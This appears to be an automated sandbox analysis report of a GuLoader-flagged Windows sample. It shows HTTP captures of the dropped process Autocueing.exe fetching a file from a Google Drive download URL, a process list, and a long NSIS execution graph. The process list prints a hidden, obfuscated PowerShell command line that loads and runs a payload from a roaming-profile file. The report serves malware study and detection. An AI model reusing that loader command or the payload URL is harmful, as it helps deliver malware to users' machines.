                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:18 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:18 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-FfgXl-vb7oeh4Bmt1uIRxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.6 | 50053 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:19 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:20 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgS9uOp4jWQ7uYNhw9vvz_CS4awMW3BGnAe5msnLrANXk5Ljgp5buQXc7YPILmZfSI-fuZW0DWk
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:19 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-wHf_og30dQpb5FZl9Q3hLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:20 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qbcK9849xeDvh_jiI7mTUA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.6 | 50054 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:20 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:21 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:21 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-7jqTJwz4ymIjZBAE1g2aVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:23:27:14
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\av8XPPpdBc.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:706'493 bytes
                                                                                                                                                                                    MD5 hash:21F092B643089F4C05D3257430075A65
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:23:27:15
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "
                                                                                                                                                                                    Imagebase:0xc20000
                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2530768595.00000000094D4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:23:27:15
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:23:27:52
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Autocueing.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:706'493 bytes
                                                                                                                                                                                    MD5 hash:21F092B643089F4C05D3257430075A65
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3393778928.0000000001764000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 62%, ReversingLabs
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false


                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:22.5%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:16.5%
                                                                                                                                                                                      Total number of Nodes:1350
                                                                                                                                                                                      Total number of Limit Nodes:30
4171->4175 4172->4175 4174 402374 SHFileOperationW 4173->4174 4174->4171 4174->4175 4176 401d86 4177 401d99 GetDlgItem 4176->4177 4178 401d8c 4176->4178 4180 401d93 4177->4180 4179 402d89 21 API calls 4178->4179 4179->4180 4181 401dda GetClientRect LoadImageW SendMessageW 4180->4181 4182 402dab 21 API calls 4180->4182 4184 401e38 4181->4184 4186 401e44 4181->4186 4182->4181 4185 401e3d DeleteObject 4184->4185 4184->4186 4185->4186 4187 402388 4188 40238f 4187->4188 4192 4023a2 4187->4192 4189 406594 21 API calls 4188->4189 4190 40239c 4189->4190 4191 405bb7 MessageBoxIndirectW 4190->4191 4191->4192 4193 402c0a SendMessageW 4194 402c24 InvalidateRect 4193->4194 4195 402c2f 4193->4195 4194->4195 4196 40460c lstrcpynW lstrlenW 4197 40248f 4198 402dab 21 API calls 4197->4198 4199 4024a1 4198->4199 4200 402dab 21 API calls 4199->4200 4201 4024ab 4200->4201 4214 402e3b 4201->4214 4204 4024e3 4206 4024ef 4204->4206 4208 402d89 21 API calls 4204->4208 4205 402933 4209 40250e RegSetValueExW 4206->4209 4211 4032b9 35 API calls 4206->4211 4207 402dab 21 API calls 4210 4024d9 lstrlenW 4207->4210 4208->4206 4212 402524 RegCloseKey 4209->4212 4210->4204 4211->4209 4212->4205 4215 402e56 4214->4215 4218 4063f2 4215->4218 4219 406401 4218->4219 4220 4024bb 4219->4220 4221 40640c RegCreateKeyExW 4219->4221 4220->4204 4220->4205 4220->4207 4221->4220 4222 402910 4223 402dab 21 API calls 4222->4223 4224 402917 FindFirstFileW 4223->4224 4225 40293f 4224->4225 4229 40292a 4224->4229 4230 40649e wsprintfW 4225->4230 4227 402948 4231 406557 lstrcpynW 4227->4231 4230->4227 4231->4229 4232 401911 4233 401948 4232->4233 4234 402dab 21 API calls 4233->4234 4235 40194d 4234->4235 4236 405c63 71 API calls 4235->4236 4237 401956 4236->4237 4238 401491 4239 4055dc 28 API calls 4238->4239 4240 401498 4239->4240 4241 401914 4242 402dab 21 API calls 4241->4242 4243 40191b 4242->4243 4244 405bb7 MessageBoxIndirectW 4243->4244 4245 401924 4244->4245 4246 404695 4247 4046ad 4246->4247 4253 4047c7 
4246->4253 4254 4044d6 22 API calls 4247->4254 4248 404831 4249 4048fb 4248->4249 4250 40483b GetDlgItem 4248->4250 4255 40453d 8 API calls 4249->4255 4251 404855 4250->4251 4252 4048bc 4250->4252 4251->4252 4258 40487b SendMessageW LoadCursorW SetCursor 4251->4258 4252->4249 4259 4048ce 4252->4259 4253->4248 4253->4249 4256 404802 GetDlgItem SendMessageW 4253->4256 4257 404714 4254->4257 4269 4048f6 4255->4269 4279 4044f8 KiUserCallbackDispatcher 4256->4279 4261 4044d6 22 API calls 4257->4261 4280 404944 4258->4280 4264 4048e4 4259->4264 4265 4048d4 SendMessageW 4259->4265 4262 404721 CheckDlgButton 4261->4262 4277 4044f8 KiUserCallbackDispatcher 4262->4277 4264->4269 4270 4048ea SendMessageW 4264->4270 4265->4264 4266 40482c 4271 404920 SendMessageW 4266->4271 4270->4269 4271->4248 4272 40473f GetDlgItem 4278 40450b SendMessageW 4272->4278 4274 404755 SendMessageW 4275 404772 GetSysColor 4274->4275 4276 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4274->4276 4275->4276 4276->4269 4277->4272 4278->4274 4279->4266 4283 405b7d ShellExecuteExW 4280->4283 4282 4048aa LoadCursorW SetCursor 4282->4252 4283->4282 4284 402896 4285 40289d 4284->4285 4291 402bae 4284->4291 4286 402d89 21 API calls 4285->4286 4287 4028a4 4286->4287 4288 4028b3 SetFilePointer 4287->4288 4289 4028c3 4288->4289 4288->4291 4292 40649e wsprintfW 4289->4292 4292->4291 4293 401f17 4294 402dab 21 API calls 4293->4294 4295 401f1d 4294->4295 4296 402dab 21 API calls 4295->4296 4297 401f26 4296->4297 4298 402dab 21 API calls 4297->4298 4299 401f2f 4298->4299 4300 402dab 21 API calls 4299->4300 4301 401f38 4300->4301 4302 401423 28 API calls 4301->4302 4303 401f3f 4302->4303 4310 405b7d ShellExecuteExW 4303->4310 4305 401f87 4306 402933 4305->4306 4307 4069f6 5 API calls 4305->4307 4308 401fa4 CloseHandle 4307->4308 4308->4306 4310->4305 4311 402f98 4312 402fc3 4311->4312 4313 402faa SetTimer 4311->4313 4314 403018 4312->4314 4315 402fdd MulDiv wsprintfW SetWindowTextW 
SetDlgItemTextW 4312->4315 4313->4312 4315->4314 3663 40571b 3664 4058c5 3663->3664 3665 40573c GetDlgItem GetDlgItem GetDlgItem 3663->3665 3667 4058f6 3664->3667 3668 4058ce GetDlgItem CreateThread CloseHandle 3664->3668 3708 40450b SendMessageW 3665->3708 3670 405921 3667->3670 3672 405946 3667->3672 3673 40590d ShowWindow ShowWindow 3667->3673 3668->3667 3711 4056af 5 API calls 3668->3711 3669 4057ac 3678 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3669->3678 3671 405981 3670->3671 3675 405935 3670->3675 3676 40595b ShowWindow 3670->3676 3671->3672 3685 40598f SendMessageW 3671->3685 3677 40453d 8 API calls 3672->3677 3710 40450b SendMessageW 3673->3710 3679 4044af SendMessageW 3675->3679 3681 40597b 3676->3681 3682 40596d 3676->3682 3680 405954 3677->3680 3683 405821 3678->3683 3684 405805 SendMessageW SendMessageW 3678->3684 3679->3672 3690 4044af SendMessageW 3681->3690 3689 4055dc 28 API calls 3682->3689 3686 405834 3683->3686 3687 405826 SendMessageW 3683->3687 3684->3683 3685->3680 3688 4059a8 CreatePopupMenu 3685->3688 3692 4044d6 22 API calls 3686->3692 3687->3686 3691 406594 21 API calls 3688->3691 3689->3681 3690->3671 3693 4059b8 AppendMenuW 3691->3693 3694 405844 3692->3694 3695 4059d5 GetWindowRect 3693->3695 3696 4059e8 TrackPopupMenu 3693->3696 3697 405881 GetDlgItem SendMessageW 3694->3697 3698 40584d ShowWindow 3694->3698 3695->3696 3696->3680 3699 405a03 3696->3699 3697->3680 3702 4058a8 SendMessageW SendMessageW 3697->3702 3700 405870 3698->3700 3701 405863 ShowWindow 3698->3701 3703 405a1f SendMessageW 3699->3703 3709 40450b SendMessageW 3700->3709 3701->3700 3702->3680 3703->3703 3704 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3703->3704 3706 405a61 SendMessageW 3704->3706 3706->3706 3707 405a8a GlobalUnlock SetClipboardData CloseClipboard 3706->3707 3707->3680 3708->3669 3709->3697 3710->3670 4316 401d1c 4317 402d89 21 API calls 4316->4317 4318 401d22 IsWindow 4317->4318 4319 401a25 4318->4319 4320 404d1d 
4321 404d49 4320->4321 4322 404d2d 4320->4322 4323 404d7c 4321->4323 4324 404d4f SHGetPathFromIDListW 4321->4324 4331 405b9b GetDlgItemTextW 4322->4331 4326 404d5f 4324->4326 4330 404d66 SendMessageW 4324->4330 4328 40140b 2 API calls 4326->4328 4327 404d3a SendMessageW 4327->4321 4328->4330 4330->4323 4331->4327 4332 40149e 4333 4023a2 4332->4333 4334 4014ac PostQuitMessage 4332->4334 4334->4333 4335 401ba0 4336 401bf1 4335->4336 4341 401bad 4335->4341 4337 401bf6 4336->4337 4338 401c1b GlobalAlloc 4336->4338 4344 4023a2 4337->4344 4356 406557 lstrcpynW 4337->4356 4339 406594 21 API calls 4338->4339 4345 401c36 4339->4345 4340 406594 21 API calls 4346 40239c 4340->4346 4342 401bc4 4341->4342 4341->4345 4354 406557 lstrcpynW 4342->4354 4345->4340 4345->4344 4350 405bb7 MessageBoxIndirectW 4346->4350 4348 401c08 GlobalFree 4348->4344 4349 401bd3 4355 406557 lstrcpynW 4349->4355 4350->4344 4352 401be2 4357 406557 lstrcpynW 4352->4357 4354->4349 4355->4352 4356->4348 4357->4344 4358 402621 4359 402dab 21 API calls 4358->4359 4360 402628 4359->4360 4363 406047 GetFileAttributesW CreateFileW 4360->4363 4362 402634 4363->4362 4364 4025a3 4365 402deb 21 API calls 4364->4365 4366 4025ad 4365->4366 4367 402d89 21 API calls 4366->4367 4368 4025b6 4367->4368 4369 4025d2 RegEnumKeyW 4368->4369 4370 4025de RegEnumValueW 4368->4370 4371 402933 4368->4371 4372 4025f3 RegCloseKey 4369->4372 4370->4372 4372->4371 3190 4015a8 3191 402dab 21 API calls 3190->3191 3192 4015af SetFileAttributesW 3191->3192 3193 4015c1 3192->3193 3194 401fa9 3195 402dab 21 API calls 3194->3195 3196 401faf 3195->3196 3197 4055dc 28 API calls 3196->3197 3198 401fb9 3197->3198 3209 405b3a CreateProcessW 3198->3209 3203 402933 3204 401fd4 3205 401fe4 3204->3205 3206 401fd9 3204->3206 3207 401fe2 CloseHandle 3205->3207 3217 40649e wsprintfW 3206->3217 3207->3203 3210 401fbf 3209->3210 3211 405b6d CloseHandle 3209->3211 3210->3203 3210->3207 3212 4069f6 WaitForSingleObject 3210->3212 3211->3210 3213 406a10 
3212->3213 3214 406a22 GetExitCodeProcess 3213->3214 3218 406987 3213->3218 3214->3204 3217->3207 3219 4069a4 PeekMessageW 3218->3219 3220 4069b4 WaitForSingleObject 3219->3220 3221 40699a DispatchMessageW 3219->3221 3220->3213 3221->3219 3222 40252f 3233 402deb 3222->3233 3225 402dab 21 API calls 3226 402542 3225->3226 3227 40254d RegQueryValueExW 3226->3227 3232 402933 3226->3232 3228 402573 RegCloseKey 3227->3228 3229 40256d 3227->3229 3228->3232 3229->3228 3238 40649e wsprintfW 3229->3238 3234 402dab 21 API calls 3233->3234 3235 402e02 3234->3235 3236 4063c4 RegOpenKeyExW 3235->3236 3237 402539 3236->3237 3237->3225 3238->3228 4374 40202f 4375 402dab 21 API calls 4374->4375 4376 402036 4375->4376 4377 40694b 5 API calls 4376->4377 4378 402045 4377->4378 4379 402061 GlobalAlloc 4378->4379 4382 4020d1 4378->4382 4380 402075 4379->4380 4379->4382 4381 40694b 5 API calls 4380->4381 4383 40207c 4381->4383 4384 40694b 5 API calls 4383->4384 4385 402086 4384->4385 4385->4382 4389 40649e wsprintfW 4385->4389 4387 4020bf 4390 40649e wsprintfW 4387->4390 4389->4387 4390->4382 4391 4021af 4392 402dab 21 API calls 4391->4392 4393 4021b6 4392->4393 4394 402dab 21 API calls 4393->4394 4395 4021c0 4394->4395 4396 402dab 21 API calls 4395->4396 4397 4021ca 4396->4397 4398 402dab 21 API calls 4397->4398 4399 4021d4 4398->4399 4400 402dab 21 API calls 4399->4400 4401 4021de 4400->4401 4402 40221d CoCreateInstance 4401->4402 4403 402dab 21 API calls 4401->4403 4404 40223c 4402->4404 4403->4402 4405 401423 28 API calls 4404->4405 4406 4022fb 4404->4406 4405->4406 3239 403532 SetErrorMode GetVersionExW 3240 403586 GetVersionExW 3239->3240 3241 4035be 3239->3241 3240->3241 3242 403615 3241->3242 3243 40694b 5 API calls 3241->3243 3244 4068db 3 API calls 3242->3244 3243->3242 3245 40362b lstrlenA 3244->3245 3245->3242 3246 40363b 3245->3246 3247 40694b 5 API calls 3246->3247 3248 403642 3247->3248 3249 40694b 5 API calls 3248->3249 3250 403649 3249->3250 3251 40694b 5 API calls 
3250->3251 3255 403655 #17 OleInitialize SHGetFileInfoW 3251->3255 3254 4036a4 GetCommandLineW 3328 406557 lstrcpynW 3254->3328 3327 406557 lstrcpynW 3255->3327 3257 4036b6 3258 405e53 CharNextW 3257->3258 3259 4036dc CharNextW 3258->3259 3267 4036ee 3259->3267 3260 4037f0 3261 403804 GetTempPathW 3260->3261 3329 403501 3261->3329 3263 40381c 3264 403820 GetWindowsDirectoryW lstrcatW 3263->3264 3265 403876 DeleteFileW 3263->3265 3268 403501 12 API calls 3264->3268 3339 403082 GetTickCount GetModuleFileNameW 3265->3339 3266 405e53 CharNextW 3266->3267 3267->3260 3267->3266 3273 4037f2 3267->3273 3270 40383c 3268->3270 3270->3265 3272 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3270->3272 3271 40388a 3274 403941 3271->3274 3277 403931 3271->3277 3281 405e53 CharNextW 3271->3281 3275 403501 12 API calls 3272->3275 3423 406557 lstrcpynW 3273->3423 3428 403b4f 3274->3428 3279 40386e 3275->3279 3367 403c29 3277->3367 3279->3265 3279->3274 3294 4038a9 3281->3294 3283 403ab3 3285 403b37 ExitProcess 3283->3285 3286 403abb GetCurrentProcess OpenProcessToken 3283->3286 3284 403a8f 3435 405bb7 3284->3435 3288 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3286->3288 3289 403b07 3286->3289 3288->3289 3296 40694b 5 API calls 3289->3296 3290 403907 3297 405f2e 18 API calls 3290->3297 3291 40394a 3295 405b22 5 API calls 3291->3295 3294->3290 3294->3291 3298 40394f lstrlenW 3295->3298 3299 403b0e 3296->3299 3300 403913 3297->3300 3426 406557 lstrcpynW 3298->3426 3302 403b23 ExitWindowsEx 3299->3302 3304 403b30 3299->3304 3300->3274 3424 406557 lstrcpynW 3300->3424 3302->3285 3302->3304 3303 403969 3306 403981 3303->3306 3427 406557 lstrcpynW 3303->3427 3439 40140b 3304->3439 3311 4039a7 wsprintfW 3306->3311 3324 4039d3 3306->3324 3308 403926 3425 406557 lstrcpynW 3308->3425 3312 406594 21 API calls 3311->3312 3312->3306 3313 405b05 2 API calls 3313->3324 3314 405aab 2 API calls 3314->3324 3315 4039e3 GetFileAttributesW 3317 4039ef DeleteFileW 
3315->3317 3315->3324 3316 403a1d SetCurrentDirectoryW 3318 406317 40 API calls 3316->3318 3317->3324 3319 403a2c CopyFileW 3318->3319 3319->3274 3319->3324 3320 405c63 71 API calls 3320->3324 3321 406317 40 API calls 3321->3324 3322 406594 21 API calls 3322->3324 3323 405b3a 2 API calls 3323->3324 3324->3274 3324->3306 3324->3311 3324->3313 3324->3314 3324->3315 3324->3316 3324->3320 3324->3321 3324->3322 3324->3323 3325 403aa5 CloseHandle 3324->3325 3326 4068b4 2 API calls 3324->3326 3325->3274 3326->3324 3327->3254 3328->3257 3330 406805 5 API calls 3329->3330 3332 40350d 3330->3332 3331 403517 3331->3263 3332->3331 3333 405e26 3 API calls 3332->3333 3334 40351f 3333->3334 3335 405b05 2 API calls 3334->3335 3336 403525 3335->3336 3337 406076 2 API calls 3336->3337 3338 403530 3337->3338 3338->3263 3442 406047 GetFileAttributesW CreateFileW 3339->3442 3341 4030c2 3362 4030d2 3341->3362 3443 406557 lstrcpynW 3341->3443 3343 4030e8 3344 405e72 2 API calls 3343->3344 3345 4030ee 3344->3345 3444 406557 lstrcpynW 3345->3444 3347 4030f9 GetFileSize 3348 4031f3 3347->3348 3352 403110 3347->3352 3445 40301e 3348->3445 3350 4031fc 3353 40322c GlobalAlloc 3350->3353 3350->3362 3480 4034ea SetFilePointer 3350->3480 3352->3348 3354 40325f 3352->3354 3352->3362 3364 40301e 6 API calls 3352->3364 3477 4034d4 3352->3477 3456 4034ea SetFilePointer 3353->3456 3359 40301e 6 API calls 3354->3359 3357 403215 3360 4034d4 ReadFile 3357->3360 3358 403247 3457 4032b9 3358->3457 3359->3362 3363 403220 3360->3363 3362->3271 3363->3353 3363->3362 3364->3352 3366 403290 SetFilePointer 3366->3362 3368 40694b 5 API calls 3367->3368 3369 403c3d 3368->3369 3370 403c43 3369->3370 3371 403c55 3369->3371 3497 40649e wsprintfW 3370->3497 3372 406425 3 API calls 3371->3372 3373 403c85 3372->3373 3374 403ca4 lstrcatW 3373->3374 